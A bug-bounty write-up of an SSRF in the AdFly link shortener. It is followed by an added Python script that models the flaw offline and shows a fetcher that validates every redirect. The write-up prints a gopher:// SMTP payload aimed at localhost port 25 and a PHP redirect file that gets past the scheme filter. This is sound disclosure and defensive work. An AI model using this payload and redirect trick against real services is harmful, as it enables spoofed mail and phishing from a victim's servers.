Hi guys, my name is Rafli Pasya. Today I want to share my story about an SSRF on AdFly. I found this bug 4 days ago and it is already fixed.
Two months ago I found an IDOR on AdFly, and 4 days ago I found an SSRF on AdFly. Using this vulnerability I was able to send an email through AdFly's own SMTP server. That is dangerous: another attacker could use it to send mail that really comes from AdFly's infrastructure to AdFly's clients, for example for phishing.
Exploitation
I prepared these tools:
1. Gopherus
2. A server to host a PHP file
First of all I tried to shorten a gopher:// URL directly, but it was blocked by the server. So I made a PHP file that redirects to the Gopherus payload, and that actually worked: evidently the filter only checked the scheme of the submitted URL and not the scheme of the redirect target the fetcher followed.
I opened a command prompt and typed:
gopherus.py --exploit fastcgi
This mode is used to exploit FastCGI and gain RCE, but because I was unable to see the response body (only the <title> tag was reflected), this exploit did not work.
So I tried the SMTP exploit instead:
gopherus.py --exploit smtp
From Mail : adf@ly
To Mail : [myemail@.x.y]
Subject: PoCSSRF
Text: [empty]
Payload:
gopher://127.0.0.1:25/_MAIL%20FROM:adf%40ly%0ARCPT%20To:myemail%0ADATA%0AFrom:adf%40ly%0ASubject:PoCSSRF%0AMessage:%0A.
Then I made a PHP file:
<?php
// The submitted URL is http://, so it passes the scheme filter; the fetcher then follows this redirect to the gopher:// SMTP payload.
header('Location: gopher://127.0.0.1:25/_MAIL%20FROM:adf%40ly%0ARCPT%20To:myemail%0ADATA%0AFrom:adf%40ly%0ASubject:PoCSSRF%0AMessage:%0A.');
?>
and uploaded it to my server.
Then I went to the AdFly site and shortened myserver.com/poc.php.
After 1–5 minutes I checked my inbox and saw an email from adf@ly.adf.ly.
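As an added example (not from the original write-up, and not AdFly's or Gopherus's code), the following Python script rebuilds the Gopherus SMTP payload shown above from its parts, decodes it back into the SMTP lines that reach port 25, and contrasts a fetcher that validates only the submitted URL with one that validates every redirect hop. The attacker hostname, its IP address and the in-memory "web" and "DNS" tables are constructed for the example so it runs offline.

```python
"""Added example: gopher:// SMTP payload construction and the redirect-based
scheme-filter bypass from the AdFly write-up, modelled offline.

None of this is AdFly's or Gopherus's code. The web server and DNS below are
in-memory dictionaries; attacker.example and 93.184.216.34 are made up.
"""
import ipaddress
from urllib.parse import quote, unquote, urlsplit

# The exact payload Gopherus produced in the write-up; used to check the builder.
PAGE_PAYLOAD = ("gopher://127.0.0.1:25/_MAIL%20FROM:adf%40ly%0ARCPT%20To:myemail"
                "%0ADATA%0AFrom:adf%40ly%0ASubject:PoCSSRF%0AMessage:%0A.")

ALLOWED_SCHEMES = ("http", "https")

# Constructed "internet": URL -> (status, headers). poc.php is the redirect page.
FAKE_WEB = {
    "http://attacker.example/poc.php": (302, {"Location": PAGE_PAYLOAD}),
}
FAKE_DNS = {"attacker.example": "93.184.216.34"}   # made-up public address


def build_gopher_smtp_url(host, port, mail_from, rcpt_to, subject, body):
    """Encode an SMTP transaction as a gopher:// URL the way Gopherus does.

    The byte after the first "/" is the gopher item type ("_" here); curl-style
    gopher clients drop it and write the URL-decoded remainder straight to the
    socket, so every %0A becomes a newline that a lenient MTA accepts as a
    line terminator.
    """
    lines = [
        f"MAIL FROM:{mail_from}",
        f"RCPT To:{rcpt_to}",
        "DATA",
        f"From:{mail_from}",
        f"Subject:{subject}",
        f"Message:{body}",
        ".",                      # terminates the DATA section
    ]
    # quote() leaves letters, digits and "_.-~" alone; keep ":" raw like Gopherus.
    return f"gopher://{host}:{port}/_" + quote("\n".join(lines), safe=":")


def decode_gopher_selector(url):
    """Return the lines that would be written to the SMTP socket for a gopher URL."""
    parts = urlsplit(url)
    if parts.scheme != "gopher":
        raise ValueError("not a gopher URL")
    selector = parts.path[1:]     # drop the leading "/"
    raw = selector[1:]            # drop the one-byte item type
    return unquote(raw).split("\n")


def naive_fetch(url, web=FAKE_WEB, max_redirects=5):
    """Model of the vulnerable shortener: the submitted URL is checked once,
    then Location headers are followed blindly. Returns the URL it ends up
    'connecting' to."""
    if urlsplit(url).scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"blocked scheme in submitted URL: {url}")
    for _ in range(max_redirects):
        status, headers = web.get(url, (200, {}))
        if status in (301, 302, 303, 307, 308) and "Location" in headers:
            url = headers["Location"]   # BUG: redirect target is never re-validated
            continue
        return url                      # a gopher:// target lands here unchecked
    raise ValueError("too many redirects")


def is_allowed_target(url, dns=FAKE_DNS):
    """Scheme allowlist plus resolve-then-check on the address; fails closed."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    try:
        ip = ipaddress.ip_address(parts.hostname)     # IP literal such as 127.0.0.1
    except ValueError:
        addr = dns.get(parts.hostname)
        if addr is None:
            return False
        ip = ipaddress.ip_address(addr)
    return ip.is_global       # rejects loopback, RFC 1918, link-local, etc.


def hardened_fetch(url, web=FAKE_WEB, dns=FAKE_DNS, max_redirects=5):
    """Same loop, but every hop, including each redirect target, is validated."""
    for _ in range(max_redirects):
        if not is_allowed_target(url, dns):
            raise ValueError(f"blocked target: {url}")
        status, headers = web.get(url, (200, {}))
        if status in (301, 302, 303, 307, 308) and "Location" in headers:
            url = headers["Location"]
            continue
        return url
    raise ValueError("too many redirects")


if __name__ == "__main__":
    built = build_gopher_smtp_url("127.0.0.1", 25, "adf@ly", "myemail", "PoCSSRF", "")
    print("builder matches write-up payload:", built == PAGE_PAYLOAD)
    print("\n".join(decode_gopher_selector(PAGE_PAYLOAD)))
    print("naive fetcher ends up at:", naive_fetch("http://attacker.example/poc.php"))
    try:
        hardened_fetch("http://attacker.example/poc.php")
    except ValueError as err:
        print("hardened fetcher:", err)
```

In a real PHP/libcurl fetcher the equivalent of `is_allowed_target` on every hop is restricting CURLOPT_PROTOCOLS and CURLOPT_REDIR_PROTOCOLS to HTTP and HTTPS (libcurl otherwise speaks gopher natively, which is why the Gopherus payload works) and resolving the hostname yourself before each connection so a redirect or DNS answer cannot land on 127.0.0.1. The example's attacker address is chosen outside the documentation ranges because Python's `is_global` treats those as non-global too.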
I quickly reported this bug to their team. It was fixed 1 day after I reported it.
Thanks for reading, sorry for the bad English btw.
Original write-up:
https://raflipasya19.blogspot.com/2019/06/adfly-ssrf-to-smtp-takeover.html
Timeline:
- Sunday 23 June 2019 23:35 GMT+7 = Bug found & reported
- Monday 24 June 2019 17:16 GMT+7 = Triaged
- Monday 24 June 2019 22:34 GMT+7 = Bug fixed